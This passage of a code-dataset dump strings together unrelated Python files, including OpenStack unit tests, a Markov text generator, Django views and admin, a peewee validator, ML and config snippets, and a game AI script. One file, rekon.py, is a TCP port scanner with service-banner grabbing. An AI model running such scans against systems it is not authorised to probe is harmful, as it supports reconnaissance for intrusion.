agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nimport unittest\n\nimport mock\nfrom cinder_task.actions import actions\nfrom cinder_task.common import clients\nfrom cinder_task.common import template\nfrom cinder_task.tests.unit import fake_data\n\n\nclass BaseTestCase(unittest.TestCase):\n \"\"\"Base test class.\"\"\"\n def setUp(self):\n self.cinder_actions = actions.CinderActions()\n self.nova_actions = actions.NovaActions()\n self.volume = fake_data.fake_volume(fake_data.VOLUME_DISPLAY_NAME,\n fake_data.VOLUME_SIZE)\n self.instance = fake_data.fake_instance(fake_data.INSTANCE_NAME,\n fake_data.FAKE_FLAVOR,\n fake_data.FAKE_IMG)\n self.fcc = fake_data.FakeCinderClient()\n self.fnc = fake_data.FakeNovaClient()\n\n\nclass TestCinderActions(BaseTestCase):\n \"\"\"Test cinder actions.\"\"\"\n @mock.patch.object(clients, '_cinder_client')\n def test_create_volume(self, mock_cinder_client):\n mock_cinder_client.return_value = self.fcc\n volume = self.cinder_actions.create_volume(\n fake_data.VOLUME_SIZE, fake_data.VOLUME_DISPLAY_NAME)\n self.assertEqual(fake_data.FakeVolumes.volume, volume)\n self.assertEqual(len(mock_cinder_client.mock_calls), 1)\n\n @mock.patch.object(clients, '_cinder_client')\n def test_list_volumes(self, mock_cinder_client):\n mock_cinder_client.return_value = self.fcc\n volumes = self.cinder_actions.list_volumes()\n self.assertEqual(len(volumes), 1)\n self.assertEqual(len(mock_cinder_client.mock_calls), 1)\n\n @mock.patch.object(clients, '_cinder_client')\n def test_get_volume_by_its_name_or_id(self, mock_cinder_client):\n mock_cinder_client.return_value = self.fcc\n volume = self.cinder_actions.show_volume(\n fake_data.VOLUME_DISPLAY_NAME)\n self.assertEqual(fake_data.FakeVolumes.volume, volume)\n self.assertEqual(len(mock_cinder_client.mock_calls), 1)\n\n\nclass TestNovaActions(BaseTestCase):\n \"\"\"Test nova actions.\"\"\"\n @mock.patch.object(clients, '_nova_client')\n def test_boot_instance(self, mock_nova_client):\n mock_nova_client.return_value = self.fnc\n instance = self.nova_actions.boot_instance('fake', 'fake_flavor',\n 'fake_image')\n self.assertEqual(self.instance, instance)\n self.assertEqual(len(mock_nova_client.mock_calls), 1)\n\n @mock.patch.object(template.UserdataTemplate, 'get_userdata')\n @mock.patch.object(clients, '_nova_client')\n @mock.patch.object(clients, '_cinder_client')\n def test_boot_instance_with_volume(self, mock_cinder_client,\n mock_nova_client, mock_get_userdata):\n mock_cinder_client.return_value = self.fcc\n mock_nova_client.return_value = self.fnc\n mock_get_userdata.return_value = 'fake_userdata'\n instance = self.nova_actions.boot_instance('fake', 'fake_flavor',\n 'fake_image',\n 'fake_volume_id')\n self.assertEqual(self.instance, instance)\n self.assertEqual(len(mock_cinder_client.mock_calls), 1)\n self.assertEqual(len(mock_nova_client.mock_calls), 1)\n self.assertEqual(len(mock_get_userdata.mock_calls), 1)\n\n @mock.patch.object(clients, '_nova_client')\n def test_list_instances(self, mock_nova_client):\n mock_nova_client.return_value = self.fnc\n instances = self.nova_actions.list()\n self.assertEqual(len(instances), 1)\n self.assertEqual(len(mock_nova_client.mock_calls), 1)\n\n @mock.patch.object(clients, '_nova_client')\n def test_get_instance(self, mock_nova_client):\n mock_nova_client.return_value = self.fnc\n instance = self.nova_actions.get_instance('fake_uuid')\n self.assertEqual(self.instance, instance)\n self.assertEqual(len(mock_nova_client.mock_calls), 1)\n","sub_path":"cinder_task/tests/unit/test_actions.py","file_name":"test_actions.py","file_ext":"py","file_size_in_byte":4589,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"402676566","text":"import os\nimport json\nimport time\nimport sys\nfrom collections import OrderedDict, defaultdict, Counter\nfrom PyDictionary import PyDictionary\nimport numpy as np\n\n# Example test files\n# https://www.gutenberg.org/ebooks/11 - Alice's Adventures in Wonderland by Lewis Carroll\n# https://www.gutenberg.org/ebooks/1342 - Pride and Prejudice by Jane Austen\n\n# dict to store words and transitions\nd = defaultdict(list)\n# dict to store frequency of occurrences of word transitions\ne = defaultdict(list)\nstart_key = 'The'\n\ndef read_training_files( ):\n global d, e\n\n ret_val = ''\n train_file = input(\">> Enter path to training file ('.' or blank to end) : \")\n while train_file != '.' and train_file != '':\n with open( train_file ) as f:\n print(\">> Processing\", train_file, \"...\")\n book = f.read()\n\n words = book.split()\n {d[words[i]].append(words[i+1]) for i in range(0, len(words)-1)}\n\n # create frequency of occurrences of the transition to a certain word\n e = { k: OrderedDict(Counter(d[k]).most_common()) for k in d.keys() }\n ret_val = train_file\n print(\"done\")\n\n train_file = input(\">> Enter path to training file ('.' or blank to end) : \")\n\n return ret_val\n\ndef markov_write_story( nwords=250, nkey='The', prob=False ):\n while num_words:\n print(nkey+' ', end='')\n p = None\n num_words -= 1\n if prob:\n # create list of probabilities of transitions for the next word\n p = np.array(list(e[nkey].values()))/sum(list(e[nkey].values()))\n nkey = np.random.choice(list(e[nkey]), p=p)\n if num_words <= 25:\n if next_key.endswith('.'):\n # time to end the story\n print(nkey)\n break\n\ndef markov_get_line( nkey='The' , prob=False, ctxt='' ):\n ''' Return a sentence using 1-order markov chaining '''\n global start_key\n skipped = False\n sentence = ''\n p = None\n\n end_chars = (('.', '?', '!'))\n\n while nkey.endswith(end_chars) == False or nkey.startswith(('\"', \"'\")):\n if nkey.startswith(('\"')) == True:\n sentence = sentence.ljust(len(sentence) + 1) + nkey \n # loop till we find a end-quote\n skipped = False\n while nkey.endswith(('\"', '.\"', ',\"')) == False:\n if skipped == False:\n nkey = np.random.choice(list(e[nkey]))\n else:\n skipped = False\n if nkey.endswith((\"'\")) or nkey.startswith((\"'\", '\"')):\n nkey = np.random.choice(list(e[nkey]))\n skipped = True\n continue\n sentence = sentence.ljust(len(sentence) + 1) + nkey\n nkey = np.random.choice(list(e[nkey])) \n elif nkey.startswith((\"'\")) == True:\n sentence = sentence.ljust(len(sentence) + 1) + nkey \n skipped = False\n while nkey.endswith((\"'\", \".'\", \",'\")) == False:\n if skipped == False:\n nkey = np.random.choice(list(e[nkey]))\n else:\n skipped = False\n if nkey.endswith( ('\"') ) or nkey.startswith( ('\"',\"'\") ):\n nkey = np.random.choice(list(e[nkey]))\n skipped = True\n continue\n sentence = sentence.ljust(len(sentence) + 1) + nkey\n nkey = np.random.choice(list(e[nkey]))\n elif nkey.endswith(('\"', \"'\")) == True:\n nkey = np.random.choice(list(e[nkey]))\n else:\n sentence = sentence.ljust(len(sentence) + 1) + nkey\n nkey = np.random.choice(list(e[nkey]))\n\n sentence = sentence.ljust(len(sentence) + 1) + nkey\n start_key = np.random.choice(list(e[nkey]))\n return sentence\n\nif __name__=='__main__':\n\n dix = PyDictionary()\n if read_training_files( ) == '':\n sys.exit()\n\n inp = input(\">> Enter context word or blank to get next sentence ('.' to end) : \")\n synonyms = []\n max_loops = 20\n \n while inp != '.':\n sentence = markov_get_line(nkey=start_key)\n if inp:\n # get synonyms (and their synonyms) for the context entered by user \n synonyms += [inp]\n synonyms += dix.synonym(inp)\n synonyms1 = synonyms\n for w in synonyms1[1:]:\n # Cannot get synonym for phrase, skip phrase\n if w.rfind(' ') == -1:\n synonyms += dix.synonym(w)\n # check to see if the sentence matches any of the context\n while any( word in map(str.lower, sentence.split()) for word in synonyms) == False and max_loops:\n sentence = markov_get_line(nkey=start_key)\n max_loops -= 1\n if max_loops == 0:\n print(\">> Could not get sentence with context for\", synonyms)\n max_loops = 20\n else:\n print(sentence)\n print(\">> Context/Synonyms:\", synonyms)\n synonyms = []\n inp = input(\">> Enter context word or blank to get next sentence ('.' to end) : \")\n","sub_path":"contextgen/markovtextgen.py","file_name":"markovtextgen.py","file_ext":"py","file_size_in_byte":5199,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"399121058","text":"from django.conf.urls import url\n\nfrom . import views\n\napp_name = \"login\"\n\nurlpatterns = [\n url(r'^$', views.index, name = 'index'),\n url(r'dologin/$', views.dologin, name = \"dologin\"),\n url(r'doregister/$', views.doregister, name = \"doregister\"),\n url(r'register/$', views.register, name = \"register\"),\n \n]\n","sub_path":"login/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":321,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"604888235","text":"from collections import defaultdict\nimport toolz as fp\n\nclass ZeroDict(dict):\n\n def __init__(self):\n super(self.__class__, self).__init__()\n self._maxval = 0\n self._sum = 0\n\n def __getitem__(self, key):\n return self.get(key, 0)\n\n def __setitem__(self, key, value):\n old_val = self[key]\n super(self.__class__, self).__setitem__(key, value)\n if value > self._maxval:\n self._maxval = value\n self._sum = self._sum - old_val + value\n\n @property\n def maxval(self):\n return self._maxval\n\n @property\n def sumval(self):\n return self._sum\n\nclass Node(object):\n '''Node in the LOMtree algorithm'''\n\n node_number = -1\n\n def __init__(self, node=None):\n '''\n Corresponds to the 'SetNode' subroutine from the paper\n :return:\n '''\n if node is None:\n self.node_number += 1\n self.node_id = self.node_number\n self.regressor = None\n else:\n self.node_id = node.node_id\n self.regressor = node.regressor\n self.m = ZeroDict()\n self.l = ZeroDict()\n self.n = ZeroDict()\n self.e = ZeroDict()\n self.E = 0.\n self.C = 0\n self.regressor = None\n self.parent = None\n self.left = None\n self.right = None\n\n def __hash__(self):\n return hash(self.node_id)\n\n @property\n def is_leaf(self):\n if self.left is None and self.right is None:\n return True\n else:\n return False\n\n def new_children(self, regressor):\n if self.regressor is None:\n self.regressor = regressor\n left = Node()\n right = Node()\n left.parent = self\n right.parent = self\n self.left = left\n self.right = right\n return left, right","sub_path":"src/python/pylsc/LOMtree/node.py","file_name":"node.py","file_ext":"py","file_size_in_byte":1857,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"638898634","text":"import numpy as np\n\n\ndef inference(w, b, x_list):\n\n return np.array(x_list) * w + b\n\n\ndef eval_loss(predict_y_list, y_list):\n p_y_list = np.array(predict_y_list)\n gt_y_list = np.array(y_list)\n return np.dot(np.transpose(p_y_list - gt_y_list), np.array(p_y_list - gt_y_list)) / len(y_list)\n\n\ndef gradient(predict_y, gt_y, x):\n diff = predict_y - gt_y\n\n dw = diff * x\n db = diff\n\n return dw, db\n\n\ndef batch_gradient(predict_y_list, gt_y_list, x_list, w, b, lr):\n\n batch_size = len(x_list)\n\n diff = np.array(predict_y_list) - np.array(gt_y_list)\n avg_dw = np.sum(np.multiply(diff, np.array(x_list))) / batch_size\n avg_db = np.sum(diff) / batch_size\n\n w -= lr * avg_dw\n b -= lr * avg_db\n return w, b\n\n\ndef train(x_list, gt_y_list, batch_size, lr, max_iter):\n\n w = 0\n b = 0\n\n for i in range(max_iter):\n indexes = np.random.choice(len(x_list), batch_size)\n\n batch_x_list = [x_list[j] for j in indexes]\n batch_y_list = [gt_y_list[j] for j in indexes]\n\n batch_predict_y_list = inference(w, b, batch_x_list)\n\n loss = eval_loss(batch_predict_y_list, batch_y_list)\n\n w, b = batch_gradient(batch_predict_y_list, batch_y_list, batch_x_list, w, b, lr)\n\n print('w: {}, b: {}'.format(w, b))\n print('loss: {}'.format(loss))\n\n return w, b\n\n\ndef gen_sample_data():\n w = np.random.randint(0, 10) + np.random.random()\t\t# for noise random.random[0, 1)\n b = np.random.randint(0, 5) + np.random.random()\n num_samples = 10000\n x_list = []\n y_list = []\n for i in range(num_samples):\n x = np.random.randint(0, 100) * np.random.random()\n y = w * x + b + np.random.random() * np.random.randint(-1, 1)\n x_list.append(x)\n y_list.append(y)\n return x_list, y_list, w, b\n\n\ndef run():\n x_list, y_list, w, b = gen_sample_data()\n lr = 0.001\n max_iter = 10000\n train(x_list, y_list, 2000, lr, max_iter)\n\n print('Final w: {}, b: {}'.format(w, b))\n\n\nif __name__ == '__main__':\n import time\n start = time.time()\n run()\n end = time.time()\n\n print('Total time used: {}'.format(end - start))\n","sub_path":"python/week3/linear_regression.py","file_name":"linear_regression.py","file_ext":"py","file_size_in_byte":2140,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"652509464","text":"import peewee\nfrom cerberus import ValidationError, Validator, errors\n\nfrom ban import db\nfrom postgis import Point\n\n\nclass ResourceValidator(Validator):\n\n ValidationError = ValidationError\n\n def __init__(self, model, *args, **kwargs):\n self.model = model\n kwargs['purge_unknown'] = True\n super().__init__(model._meta.resource_schema, *args, **kwargs)\n\n def _validate_type_point(self, field, value):\n if not isinstance(value, (str, list, tuple, Point)):\n self._error(field, 'Invalid Point: {}'.format(value))\n\n def _validate_unique(self, unique, field, value):\n qs = self.model.select()\n attr = getattr(self.model, field)\n qs = qs.where(attr == value)\n if self.instance:\n qs = qs.where(self.model.id != self.instance.id)\n if qs.exists():\n self._error(field, 'Duplicate value for {}: {}'.format(field,\n value))\n\n def _validate_coerce(self, coerce, field, value):\n # See https://github.com/nicolaiarocci/cerberus/issues/171.\n try:\n value = coerce(value)\n except (TypeError, ValueError, peewee.DoesNotExist):\n self._error(field, errors.ERROR_COERCION_FAILED.format(field))\n return value\n\n def validate(self, data, instance=None, **kwargs):\n self.instance = instance\n super().validate(data, **kwargs)\n if ('version' in self.schema and instance\n and not self.document.get('version')):\n self._error('version', errors.ERROR_REQUIRED_FIELD)\n\n def save(self):\n if self.errors:\n raise ValidationError('Invalid document')\n if self.instance:\n for key, value in self.document.items():\n setattr(self.instance, key, value)\n self.instance.save()\n else:\n m2m = {}\n data = {}\n for key, value in self.document.items():\n field = getattr(self.model, key)\n if isinstance(field, db.ManyToManyField):\n m2m[key] = value\n else:\n data[key] = value\n self.instance = self.model.create(**data)\n # m2m need the instance to be saved.\n for key, value in m2m.items():\n setattr(self.instance, key, value)\n return self.instance\n\n\nclass ResourceQueryResultWrapper(peewee.ModelQueryResultWrapper):\n\n def process_row(self, row):\n instance = super().process_row(row)\n return instance.as_resource\n\n\nclass ResourceListQueryResultWrapper(peewee.ModelQueryResultWrapper):\n\n def process_row(self, row):\n instance = super().process_row(row)\n return instance.as_list\n\n\nclass SelectQuery(db.SelectQuery):\n\n @peewee.returns_clone\n def as_resource(self):\n self._result_wrapper = ResourceQueryResultWrapper\n\n @peewee.returns_clone\n def as_resource_list(self):\n self._result_wrapper = ResourceListQueryResultWrapper\n\n\nclass BaseResource(peewee.BaseModel):\n\n def __new__(mcs, name, bases, attrs, **kwargs):\n # Inherit and extend instead of replacing.\n resource_fields = attrs.pop('resource_fields', None)\n cls = super().__new__(mcs, name, bases, attrs, **kwargs)\n if resource_fields is not None:\n inherited = getattr(cls, 'resource_fields', None)\n if inherited:\n resource_fields.extend(inherited)\n cls.resource_fields = resource_fields\n cls.fields_for_resource = cls.resource_fields\n cls.fields_for_relation = [\n n for n in cls.fields_for_resource\n if not isinstance(getattr(cls, n, None), db.ManyToManyField)\n and not n == 'version']\n cls.fields_for_list = cls.fields_for_relation + ['resource']\n cls._meta.resource_schema = cls.build_resource_schema()\n return cls\n\n\nclass ResourceModel(db.Model, metaclass=BaseResource):\n resource_fields = ['id']\n identifiers = []\n\n class Meta:\n abstract = True\n resource_schema = {}\n manager = SelectQuery\n\n @classmethod\n def build_resource_schema(cls):\n schema = {}\n for name, field in cls._meta.fields.items():\n if name not in cls.fields_for_resource:\n continue\n if field.primary_key:\n continue\n type_ = getattr(field.__class__, 'schema_type', None)\n if not type_:\n continue\n row = {\n 'type': type_,\n 'required': not field.null,\n 'coerce': field.coerce,\n }\n if field.unique:\n row['unique'] = True\n max_length = getattr(field, 'max_length', None)\n if max_length:\n row['maxlength'] = max_length\n if not field.null:\n row['empty'] = False\n row.update(cls._meta.resource_schema.get(name, {}))\n schema[name] = row\n return schema\n\n @classmethod\n def validator(cls, instance=None, update=False, **data):\n validator = ResourceValidator(cls)\n validator(data, update=update, instance=instance)\n return validator\n\n @property\n def resource(self):\n return self.__class__.__name__.lower()\n\n @property\n def as_resource(self):\n return {f: self.as_resource_field(f) for f in self.fields_for_resource}\n\n @property\n def as_list(self):\n return {f: self.as_list_field(f) for f in self.fields_for_list}\n\n @property\n def as_relation(self):\n return {f: self.as_relation_field(f) for f in self.fields_for_relation}\n\n def as_resource_field(self, name):\n value = getattr(self, '{}_resource'.format(name), getattr(self, name))\n return getattr(value, 'as_relation', value)\n\n def as_relation_field(self, name):\n value = getattr(self, name)\n return getattr(value, 'id', value)\n\n def as_list_field(self, name):\n value = getattr(self, '{}_resource'.format(name), getattr(self, name))\n return getattr(value, 'id', value)\n\n @classmethod\n def coerce(cls, id, identifier=None):\n if not identifier:\n identifier = 'id'\n if isinstance(id, str):\n *extra, id = id.split(':')\n if extra:\n identifier = extra[0]\n if identifier not in cls.identifiers + ['id']:\n raise cls.DoesNotExist(\"Invalid identifier {}\".format(\n identifier))\n try:\n return cls.get(getattr(cls, identifier) == id)\n except cls.DoesNotExist:\n # Is it an old identifier?\n from .versioning import IdentifierRedirect\n new = IdentifierRedirect.follow(cls, identifier, id)\n if new:\n return cls.get(getattr(cls, identifier) == new)\n else:\n raise\n","sub_path":"ban/core/resource.py","file_name":"resource.py","file_ext":"py","file_size_in_byte":7015,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"12554192","text":"import socket\nimport os\nimport sys\nimport argparse\nfrom time import sleep\nimport http.client\n\nwait = 1\ndelay = 0\nbanner = 0\n\n\ndef printRes(response, ip, port):\n if response:\n if response == 111:\n print (ip + \"\\t%d\\tClosed\" %port)\n else: \n print (ip + \"\\t%d\\tFiltered\" %port)\n else:\n if banner:\n print ((ip + \"\\t%d\\tOpen\" %port) + \"\\tBanner:\")\n print (\"\\t\\t\\t\\t\"+ bannerGrab(ip, port))\n else:\n print (ip + \"\\t%d\\tOpen\" %port) \n\ndef TCPScan(ip, port):\n s = socket.socket() \n global delay, wait\n s.settimeout(1)\n response = s.connect_ex((ip, port)) \n printRes(response, ip, port)\n sleep(delay)\n s.close()\n\ndef bannerGrab(ip, port):\n try:\n conn = http.client.HTTPConnection(ip, port)\n conn.request(\"GET\", \"/\")\n res = conn.getresponse()\n banner = str(res.getheaders()).lower()\n final = \"\"\n if \"server\" in banner:\n banner2=banner[banner.find(\"server\"):]\n banner2=banner2[10:banner2.find(\"')\")]\n if len(banner2) > 1:\n final += \"Server: \" + banner2\n if \"powered-by\" in banner:\n banner3=banner[banner.find(\"powered-by\"):]\n banner3=banner3[14:banner3.find(\"')\")]\n if len(banner3) > 1:\n final += banner3\n if len(final) > 1:\n return final\n except: \n pass \n try:\n s=socket.socket() \n s.settimeout(2)\n s.connect((ip,port)) \n banner = \"\"\n try:\n banner = str(s.recv(4096)).replace(\"\\r\", \"\").replace(\"\\n\", \"\") \n print(banner)\n if len(banner) > 5:\n return remove_control_chars(banner)\n except Exception as e:\n print (str(e))\n try:\n s.sendall(\"\\n\".encode(\"utf-8\"))\n banner = str(s.recv(4096)).replace(\"\\r\", \"\").replace(\"\\n\", \"\") \n s.close()\n if len(banner) > 5:\n return remove_control_chars(banner) \n except Exception as e: \n print (str(e))\n \n except Exception as e: \n print (str(e))\n return \"No Banner Found\" \n\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\"-i\", help=\"ip address/range to scan\")\nparser.add_argument(\"-p\", help=\"ports to scan\")\nparser.add_argument(\"-d\", help=\"sets the delay time between ports\")\nparser.add_argument(\"-b\", help=\"obtain banner\", action=\"store_true\")\nparser.add_argument(\"-w\", help=\"sets the max wait time for a response, before the port is considered to be filtered\")\nargs = parser.parse_args()\n\nif args.b:\n banner = 1 \n\nif not args.i is None:\n ip = args.i\n ports = args.p\n print(\"Scanning \" +ip+ \" with ports \" + ports)\n TCPScan(ip,int(ports))\n\n\n\n","sub_path":"rekon.py","file_name":"rekon.py","file_ext":"py","file_size_in_byte":2795,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"631408628","text":"import unittest\nimport HTMLTestRunner\nimport os\nimport time\n#search方法\nclass Search():\n def search(self):\n print(\"search方法\")\nclass TestDemo(unittest.TestCase):\n #在每个方法的前执行\n def setUp(self) -> None:\n print(\"setup\")\n #在每个方法的后执行\n def tearDown(self) -> None:\n print(\"tearDown\")\n\n def test_search(self):\n print(\"search11111111111\")\n search = Search()\n search.search()\n def test_search1(self):\n print(\"search2222222222\")\n search = Search()\n search.search()\n\nif __name__ == '__main__':\n # unittest.main()\n suit = unittest.TestSuite()\n suit.addTest(TestDemo(\"test_search\"))\n suit.addTest(TestDemo(\"test_search1\"))\n # unittest.TextTestRunner().run(suit)\n report_path = os.path.join(os.path.dirname(__file__),'report')\n now = time.strftime(\"%Y-%m-%d %H_%M_%S\",time.localtime())\n filename = report_path+\"/\"+now+\"_result.html\"\n fname1 = \"wode.html\"\n with open(filename,'wb')as fp:\n runner = HTMLTestRunner.HTMLTestRunner(stream=fp, title=\"MyReport\", description='测试一下哈')\n runner.run(suit)","sub_path":"test_unittestdemo.py","file_name":"test_unittestdemo.py","file_ext":"py","file_size_in_byte":1157,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"10207723","text":"\"\"\"\nOpdracht 14 - Levensverwachting\nhttps://dodona.ugent.be/nl/exercises/849566952/\n\"\"\"\n\ndef berekenGeslacht(leeftijd, geslacht: str):\n if geslacht == 'man':\n return leeftijd\n else:\n leeftijd = leeftijd + 4\n return leeftijd\n\ndef berekenRoker(leeftijd, roker: bool):\n if roker == True:\n leeftijd = leeftijd - 5\n return leeftijd\n else:\n leeftijd = leeftijd + 5\n return leeftijd\n\ndef berekenSport(leeftijd, sport: int):\n if sport == 0:\n leeftijd = leeftijd - 3\n return leeftijd\n elif sport > 0:\n leeftijd = leeftijd + sport\n return leeftijd\n\ndef berekenAlcohol(leeftijd, alcohol: int):\n if alcohol == 0:\n leeftijd = leeftijd + 2\n return leeftijd\n elif alcohol <= 7:\n return leeftijd\n else:\n newAlcohol = (alcohol - 7) * 0.5\n leeftijd = leeftijd - newAlcohol\n return leeftijd\n\ndef berekenFastfood(leeftijd, fastfood: bool):\n if fastfood == True:\n return leeftijd\n else:\n leeftijd = leeftijd + 3\n return leeftijd\n\ndef levensverwachting(geslacht: str, roker: bool, sport: int, alcohol: int, fastfood: bool):\n leeftijd = 70\n leeftijd = berekenGeslacht(leeftijd, geslacht)\n leeftijd = berekenRoker(leeftijd, roker)\n leeftijd = berekenSport(leeftijd, sport)\n leeftijd = berekenAlcohol(leeftijd, alcohol)\n leeftijd = berekenFastfood(leeftijd, fastfood)\n print('%.1f' % leeftijd)\n\ndef main():\n levensverwachting(geslacht='man', roker=True, sport=2, alcohol=10, fastfood=True)\n levensverwachting(geslacht='man', roker=True, sport=5, alcohol=5, fastfood=True)\n levensverwachting(geslacht='vrouw', roker=False, sport=5, alcohol=0, fastfood=False)\n levensverwachting(geslacht='vrouw', roker=False, sport=3, alcohol=14, fastfood=True)\n levensverwachting(geslacht='man', roker=False, sport=4, alcohol=4, fastfood=False)\n\nif __name__ == '__main__':\n main()","sub_path":"week03/Levensverwachting.py","file_name":"Levensverwachting.py","file_ext":"py","file_size_in_byte":1950,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"34046932","text":"import json\n\nfrom django.contrib import admin\nfrom django.core.serializers.json import DjangoJSONEncoder\nfrom django.db.models import F\nfrom django.db.models.functions import TruncDay\n\nfrom core.models import Food, Compatibility, Recommendation, Wall, Statistics\n\n\n@admin.register(Food)\nclass FoodAdmin(admin.ModelAdmin):\n list_display = (\n 'id',\n 'name',\n 'type',\n 'quantity',\n 'calories'\n )\n\n fields = ('name', 'type', 'quantity', 'calories', 'carbs', 'proteins', 'fat')\n\n\n@admin.register(Compatibility)\nclass CompatibilityAdmin(admin.ModelAdmin):\n list_display = (\n 'id',\n 'food1',\n 'food2',\n 'count'\n )\n\n fields = ('count', 'food1', 'food2')\n\n\n@admin.register(Statistics)\nclass StatisticsAdmin(admin.ModelAdmin):\n list_display = (\n 'id',\n 'day',\n 'food',\n 'amount'\n )\n\n fields = ('day', 'food', 'amount')\n\n def changelist_view(self, request, extra_context=None):\n chart_data = (\n Statistics.objects.annotate(date=TruncDay(\"day\"))\n .values(\"date\")\n .annotate(y=F(\"amount\"))\n .order_by(\"-date\")\n )\n\n as_json = json.dumps(list(chart_data), cls=DjangoJSONEncoder)\n extra_context = extra_context or {\"chart_data\": as_json}\n\n return super().changelist_view(request, extra_context=extra_context)\n\n\n@admin.register(Recommendation)\nclass RecommendationAdmin(admin.ModelAdmin):\n list_display = (\n 'id',\n 'recommend'\n )\n\n fields = ('recommend',)\n\n\n@admin.register(Wall)\nclass WallAdmin(admin.ModelAdmin):\n list_display = (\n 'id',\n 'user',\n 'statistics'\n )\n\n fields = ('user', 'statistics')\n readonly_fields = ('user',)\n","sub_path":"my_food/core/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":1780,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"462442757","text":"\nimport copy\n\nconfigs = dict()\n\nconfig = dict(\n agent=dict(),\n algo=dict(\n discount=0.99,\n learning_rate=3e-4,\n clip_grad_norm=1e6,\n entropy_loss_coeff=0.0,\n gae_lambda=0.95,\n minibatches=32,\n epochs=10,\n ratio_clip=0.2,\n normalize_advantage=True,\n linear_lr_schedule=True,\n ),\n env=dict(id=\"Hopper-v3\"),\n model=dict(),\n optim=dict(),\n runner=dict(\n n_steps=1e6,\n log_interval_steps=2048 * 10,\n ),\n sampler=dict(\n batch_T=2048,\n batch_B=1,\n max_decorrelation_steps=1000,\n ),\n)\n\nconfigs[\"ppo_1M_serial\"] = config","sub_path":"rlpyt/experiments/configs/mujoco/pg/mujoco_ppo.py","file_name":"mujoco_ppo.py","file_ext":"py","file_size_in_byte":646,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"354713411","text":"import App\n\ndef CreateAI(pShip):\n\timport MissionLib\n\tpPlayer = MissionLib.GetPlayer()\n\t#########################################\n\t# Creating PlainAI FollowPlayer at (325, 106)\n\tpFollowPlayer = App.PlainAI_Create(pShip, \"FollowPlayer\")\n\tpFollowPlayer.SetScriptModule(\"FollowObject\")\n\tpFollowPlayer.SetInterruptable(1)\n\tpScript = pFollowPlayer.GetScriptInstance()\n\tpScript.SetFollowObjectName(pPlayer.GetName())\n\t# Done creating PlainAI FollowPlayer\n\t#########################################\n\t#########################################\n\t# Creating CompoundAI FollowThroughWarp at (452, 116)\n\timport AI.Compound.FollowThroughWarp\n\tpFollowThroughWarp = AI.Compound.FollowThroughWarp.CreateAI(pShip, pPlayer.GetName(), FollowToSB12 = 1, FollowThroughMissions = 1)\n\t# Done creating CompoundAI FollowThroughWarp\n\t#########################################\n\t#########################################\n\t# Creating PriorityListAI PriorityList at (202, 170)\n\tpPriorityList = App.PriorityListAI_Create(pShip, \"PriorityList\")\n\tpPriorityList.SetInterruptable(1)\n\t# SeqBlock is at (376, 284)\n\tpPriorityList.AddAI(pFollowPlayer, 1)\n\tpPriorityList.AddAI(pFollowThroughWarp, 2)\n\t# Done creating PriorityListAI PriorityList\n\t#########################################\n\t#########################################\n\t# Creating PreprocessingAI AvoidObstacles at (78, 219)\n\t## Setup:\n\timport AI.Preprocessors\n\tpScript = AI.Preprocessors.AvoidObstacles()\n\t## The PreprocessingAI:\n\tpAvoidObstacles = App.PreprocessingAI_Create(pShip, \"AvoidObstacles\")\n\tpAvoidObstacles.SetInterruptable(1)\n\tpAvoidObstacles.SetPreprocessingMethod(pScript, \"Update\")\n\tpAvoidObstacles.SetContainedAI(pPriorityList)\n\t# Done creating PreprocessingAI AvoidObstacles\n\t#########################################\n\treturn pAvoidObstacles\n","sub_path":"scripts/Custom/RandomEnc/ai/FollowAI.py","file_name":"FollowAI.py","file_ext":"py","file_size_in_byte":1780,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"292590000","text":"import matplotlib.pyplot as plt\nfrom mpl_toolkits.axes_grid1 import make_axes_locatable\nplt.ion()\n\nimport Nowack_Lab.Utilities.save\n\nfrom Nowack_Lab.Utilities.save import Measurement\n\n\n\n\npath = '/labshare/data/spruce/experiments/2017-07-15_4k_scan/2017-07-16/'\nfilename = '2017-07-15_184250_Scanplane'\n\nscan = Measurement.load(path+filename)\n\nfig = plt.figure();\n\nax = plt.subplot(111, aspect='equal')\n\nimage = ax.imshow(scan.V['acy'], cmap='bwr', \n origin='lower',\n extent=[scan.X.min(), scan.X.max(),\n scan.Y.min(), scan.Y.max()])\nd = make_axes_locatable(ax)\ncax = d.append_axes('right', size=0.1, pad=0.1)\ncbar = plt.colorbar(image, cax=cax)\ncbar.set_label('AC X (V)')\nax.set_xlabel('X position (V)') \nax.set_ylabel('Y position (V)') \n","sub_path":"2017/07/18/plotscan.py","file_name":"plotscan.py","file_ext":"py","file_size_in_byte":798,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"505656394","text":"# -*- coding: utf-8 -*-\nimport scrapy\nimport re\nfrom baidunews.items import BaidunewsItem\nfrom scrapy.http import Request\n\nclass N1Spider(scrapy.Spider):\n name = 'n1'\n allowed_domains = ['baidu.com']\n start_urls = ['http://news.baidu.com/widget?id=LocalHouseNews&ajax=json']\n allid = ['LocalHouseNews', 'LocalNews', 'civilnews', 'InternationalNews', 'EnterNews', 'SportNews', 'FinanceNews',\n 'TechNews', 'MilitaryNews', 